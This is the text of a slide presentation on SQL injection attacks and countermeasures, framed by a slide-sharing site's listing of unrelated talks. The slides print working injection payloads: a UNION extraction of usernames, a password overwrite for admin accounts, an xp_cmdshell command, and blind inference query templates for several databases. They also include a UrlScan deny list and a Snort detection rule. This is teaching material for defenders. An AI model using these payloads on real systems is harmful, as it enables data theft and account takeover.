Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 

Web application attacks using Sql injection and countermasures

  • 1. SQL INJECTION ATTACKS Cade Zvavanjanja CISO Gainful Information Security Introduction Background Techniques Prevention Demo Conclusions Questions
  • 2. OUTLINE  Background of SQL Injection  Techniques and Examples  Preventing SQL Injection  Demo  Wrap-Up  Questions Introduction Background Techniques Prevention Demo Conclusions Questions
  • 3. BACKGROUND OF SQL INJECTION Introduction Background Techniques Prevention Demo Conclusions Questions
  • 4. DATABASES: WHERE ARE THEY NOW? Fat Server Fat Client Fat Server & Fat Client Mainframes X Desktop Apps X Web Apps X Introduction Background Techniques Prevention Demo Conclusions Questions
  • 5. WHY IS SQL A STANDARD? Relational Database Platform Runtime Loose Interpretation Independence Semantics Introduction Background Techniques Prevention Demo Conclusions Questions
  • 6. FLEXIBILITY = VULNERABILITY  Simple Injection  Decoding Error Messages  Blind Injection  Encoding Exploits  Stored Procedures ---  Programmer Error (Faulty Logic) Introduction Background Techniques Prevention Demo Conclusions Questions
  • 7. SQL Injection Techniques Introduction Background Techniques Prevention Demo Conclusions Questions
  • 8. IMPORTANT SYMBOLS ‘  “Hack” --  “Comment Out” ;  “End Statement” %,*  “Wildcards”
  • 9. SQL INJECTION DEFINITION The input field is modified in such a way that the Database returns unintended data. Sql: SELECT <column name> FROM <Table name> WHERE <logic expression>
  • 10. EXAMPLE: DATABASE SCHEMA  Table Users  Has columns “username” and “password”  Accessed when users log in  Table Customers  Has column “phone”  Users can look up other customer phone numbers by name  Application does no input validation Introduction Background Techniques Prevention Demo Conclusions Questions
  • 11. RETURNING EXTRA ROWS WITH “UNION”  Query: SELECT phone FROM Customers WHERE last_name = ‘<name>’  Input: x’ UNION SELECT username FROM users WHERE ‘x’ = ‘x Introduction Background Techniques Prevention Demo Conclusions Questions
  • 12. MODIFYING RECORDS  Application has password changing page  SQL: UPDATE users SET password = ‘<newpassword>’ WHERE username = ‘<username>’  Input: newpassword’ WHERE username LIKE ‘%admin%’ -- Introduction Background Techniques Prevention Demo Conclusions Questions
  • 13. MS SQL SERVER  Default SQL Server setup  Defaultsystem admin account “sa” enabled  No password!!!  Supports multiple queries  “Extended stored procedures”: C/C++ DLL files  Read/writeexternal files  Access command line Introduction Background Techniques Prevention Demo Conclusions Questions
  • 14. EXPLOITING SQL SERVER  Use phone look-up query again: SELECT phone FROM customers WHERE last_name = ‘<name>’  Input: '; exec master..xp_cmdshell 'iisreset'; -- Introduction Background Techniques Prevention Demo Conclusions Questions
  • 15. DATA-MINING WITH SQL INJECTION  Three classes of data-mining  In-band  Out-of-band  Inference
  • 16. IN-BAND ATTACKS  Data is included in response from the web server  Could be a well rendered web page  Using UNION SELECTS  Error messages
  • 17. OUT-OF-BAND ATTACKS  Data is retrieved using another communication channel:  UTL_HTTP.REQUEST  OPENROWSET  XP_SENDMAIL
  • 18. INFERENCE ATTACKS  At the core of inference is a question  Action taken based upon the answer  Chris Anley’s time delay: declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'
  • 19. INFERENCE ATTACKS…CONT:  Examples:  Time Delay  Generate 200/500 responses  Response Variation  Wildly Silly Example – send mail to tech support of XYZ Corp about modem problem or monitor problem – if the call comes about a modem problem we know the answer
  • 20. INFERENCE ATTACKS…CONT:  CASE statements in SQL: SELECT CASE WHEN condition THEN do_one_thing ELSE do_another END
  • 21. INFERENCE THROUGH WEB SERVER RESPONSE CODES  Need query that will compile fine but generate error on branch execution: SELECT CASE WHEN condition THEN 1 ELSE 1/0 END
  • 22. INFERENCE THROUGH WEB SERVER RESPONSE CODES…CONT:  Notes:  Works well with SQL Server, Oracle, DB2  MySQL returns NULL  Informix ODBC driver returns 200 – even in event of error  Response code could be 302 Redirect, etc – principle is the same.  Leaves a large number of 500 response in log files  App Environments like PL/SQL will return 404 instead of 500
  • 23. INFERENCE THROUGH RESPONSE VARIATIONS:  Parameter Splitting and Balancing  Avoids 500 responses
  • 24. PARAMETER SPLITTING AND BALANCING  ‘NGSSOFTWARE’  ‘NGSSOFTWA’+’RE’  ‘NGSSOFTWA’||’RE’  ‘NGSSOFTWA’|| (SUBSELECT RETURNS R) || ‘E’  ‘NGSSOFTWA’ + (SUBSELECT RETURNS R) + ‘E’  2 1 +1  1 + (SUBSELECT RETURNS 1)
  • 25. DEALING WITH VARIOUS APPLICATION ENVIRONMENTS  Cold Fusion Management  Converts “ to &quot;  Converts & to &amp;  Converts > to &gt;  Converts < to &lt;  Doubles up single quotes  Usually means attack vector is numeric input  PHP often doubles single quote – magic quotes
  • 26. DEALING WITH VARIOUS APPLICATION ENVIRONMENTS… CONT:  Rather than > use BETWEEN X AND Y  Rather than & use ^ A xor BIT = C  if C is greater than A then Bit is not set  If C is less than A then Bit is set  Rather than ‘A’ use CHR(65)/CHAR(65)
  • 27. INFERENCE QUERIES…  SQL Server – String data ' + (select case when ascii(substring((sub-query),the_byte,1))^the_bit between 0 and ascii(substring((sub- query),the_byte,1)) then char(known_value) else char(1/0) end) + '
  • 28. INFERENCE QUERIES…  Oracle – Numeric + (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then 0 else 1/0 end from dual)
  • 29. INFERENCE QUERIES…  Oracle – String data '|| (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then chr(known_val) else chr(1/0) end from dual) ||'
  • 30. INFERENCE QUERIES…  MySQL – Numeric + (select case when (ascii(substring((sub- query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end (uses page response variation)
  • 31. INFERENCE QUERIES…  MySQL – String Data ' + (select case when (ascii(substring((sub- query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end) + ‘ (one returns no recordset – the other returns all rows)
  • 32. INFERENCE QUERIES…  Informix – Numeric + (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",12 6,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1", 49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@", 64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72," I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",8 1,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z ",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",1 04,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p", 112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119," x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 1 else (1/bitval(2,1)) end from sysmaster:informix.systables)-1
  • 33. INFERENCE QUERIES…  Informix – String data ' || (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",12 6,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1", 49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@", 64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72," I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",8 1,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z ",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",1 04,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p", 112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119," x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 'xFC' else (1/bitval(2,1))::char end from sysmaster:informix.systables) ||'
  • 34. PREVENTING SQL INJECTION Introduction Background Techniques Prevention Demo Conclusions Questions
  • 35. PREVENTING SQL INJECTION Input Validation Input Checking Functions Access Rights User Permissions Variable Placeholders Stored Procedures Introduction Background Techniques Prevention Demo Conclusions Questions
  • 36. INPUT VALIDATION  Checks  Type  Size  Format  Range  Replace quotation marks “All input is wrong and dangerous” Introduction Background Techniques Prevention Demo Conclusions Questions
  • 37. INPUT CHECKING FUNCTIONS  Built in character rejection $sql = “SELECT * FROM Users WHERE ID = ‘” . $_GET[‘id’] . “’”; $sql = “SELECT * FROM Users WHERE ID =” . mysql_real_escape_string($_GET[‘id’] ); $result = mysql_query($sql); Introduction Background Techniques Prevention Demo Conclusions Questions
  • 38. ACCESS RIGHTS Web User vs. System Administrator – ‘sa’ Introduction Background Techniques Prevention Demo Conclusions Questions
  • 39. USER PERMISSIONS  Limit query access rights  SELECT  UPDATE  DROP  Restricted statement access  Global-specific  Database-specific  Table-specific Introduction Background Techniques Prevention Demo Conclusions Questions
  • 40. VARIABLE PLACEHOLDERS (?)  Defense from String Concatenation  Enforcing database data types PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?"); prep.setString(1, pwd); Introduction Background Techniques Prevention Demo Conclusions Questions
  • 41. STORED PROCEDURES  Use error checking variables  Buffer direct database access Introduction Background Techniques Prevention Demo Conclusions Questions
  • 42. DEMONSTRATION Introduction Background Techniques Prevention Demo Conclusions Questions
  • 43. COUNTERMEASURES  System Administrators  White List / Blacklist Input Validation  Least Privileges  Application firewalls  Developer  StoredProcedures  Parameterized queries  Exception handling
  • 44. WHITELIST INPUT VALIDATION  UrlScan v3.0  restricts the types of HTTP requests that IIS will process [SQL Injection Headers] AppliesTo=.asp,.aspx [SQL Injection Headers Strings] -- @ ; also catches @@ alter delete drop exec insert alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection "; flow:to_server,established;  SNORT uricontent:".php | .aspx | .asp"; pcre:"/(%27)|(')|(--)|(%23)|(#)/i";  Create rule to check for SQL attack classtype:Web-application-attack; sid:9099; rev:5;)
  • 45. LEAST PRIVILEGES  Enforce least privileges  CREATE / DELETE  Does not guarantee security  Access to portion of data  Create views
  • 46. CONCLUSIONS  SQL Injection continues to evolve with new technologies  Dangerous Effects  Access to critical information  Updating data not meant to be updated  Exploiting DBMS to directly affect the server and its resources  Prevention of SQL Injection  Input Validation and Query Building  Permissions and Access Rights  Variable Placeholders (Prepare) and Stored Procedures Introduction Background Techniques Prevention Demo Conclusions Questions
  • 47. QUESTIONS  1) What could prevent the ‘Students’ table from being dropped?  2) What is another way to prevent Injection? Introduction Background Techniques Prevention Demo Conclusions Questions
  • 48. REFERENCES  Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter 27. Database Security." PHP Manual. 13 January 2005. PHP Documentation Group. 07 Apr. 2005 <http://www.php- center.de/en-html-manual/security.database.sql- injection.html>.  Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt, 1989. 427-433.  "Exploits of a Mom." xkcd.com. 4 Mar. 2008 <http://xkcd.com/327/>.  Finnigan, Pete. " SQL Injection and Oracle, Part One ." SecurityFocus 21 November 2002. 07 Apr 2005 <http://www.securityfocus.com/infocus/1644>.  Harper, Mitchell. "SQL Injection Attacks: Are You Safe?." Dev Articles. 29 May. 2002. 07 Apr. 2005 <http://www.devarticles.com/c/a/MySQL/SQL-Injection- Attacks-Are-You-Safe/2/>. Introduction Background Techniques Prevention Demo Conclusions Questions
  • 49. Thank You Tel: +236 733 782 490 +263 773 796 365 +263 -4- 733 117 Eml: info@gis.co.zw cade@gis.co.zw Web: www.gis.co.zw Introduction Background Techniques Prevention Demo Conclusions Questions

Notes de l'éditeur

  1. RFID virus uses MS SQL Server commands.
  2. PHP example
  3. May remove this slide
  4. http://sacs.ucf.edu/ccr/cct_welcome.asp
  5. What is WhiteList/Blacklist input validation - explain Choose whitelist over black list it much easier to accept valid states than it is to denythem
  6. This will not prevent SQL injection attack but it will minimize it. Create/Delete – you application will most likely never have to create and drop tables at runtime Elevation of privileges Views should only access data that is required for the application